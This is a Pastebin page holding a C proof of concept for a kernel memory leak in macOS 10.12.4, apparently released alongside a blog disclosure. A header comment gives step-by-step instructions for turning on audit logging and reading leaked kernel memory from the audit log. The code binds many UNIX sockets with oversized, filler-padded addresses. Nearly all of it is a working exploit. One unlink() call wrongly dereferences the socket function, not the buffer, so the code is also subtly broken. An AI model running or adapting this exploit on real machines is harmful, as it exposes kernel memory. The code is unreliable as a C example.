Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- #include <sys/un.h>
- #include <unistd.h>
- #include <sys/types.h>
- #include <sys/socket.h>
- /*
- macOS 10.12.4 0day kernel memory leak PoC (see: https://objective-see.com/blog/blog_0x1B.html)
- tl;dr Apple 'fixed' a bug by #1 not fixing it, #2 introducing a kernel memory leak ¯\_(ツ)_/¯
- #1 enable (network) auditing:
- a) add 'nt' to /etc/security/audit_control: flags:lo,aa,nt
- or
- b) read directly off /dev/auditpipe (after configuring it with AUDIT_CLASS_NETWORK)
- #2 run this program
- #3 dump the audit log, /var/audit/current, to view leaked kernel memory
- note: r00t is required for #1 && #3, so impact of this bug is limited
- */
- int main(int argc, char*argv[])
- {
- //make a bunch of sockets
- for(int i=0; i<100; i++)
- {
- //random size [128 - 256]
- int size = arc4random_uniform(128)+128;
- //alloc/set buffer
- char* unixSocket = malloc(size);
- memset(unixSocket, 0x41, size);
- //init
- ((struct sockaddr_un*)unixSocket)->sun_len = size;
- ((struct sockaddr_un*)unixSocket)->sun_family = AF_UNIX;
- //unlink/bind
- unlink(((struct sockaddr_un*)socket)->sun_path);
- bind(socket(AF_UNIX, SOCK_STREAM, 0), (struct sockaddr *)unixSocket, size);
- }
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement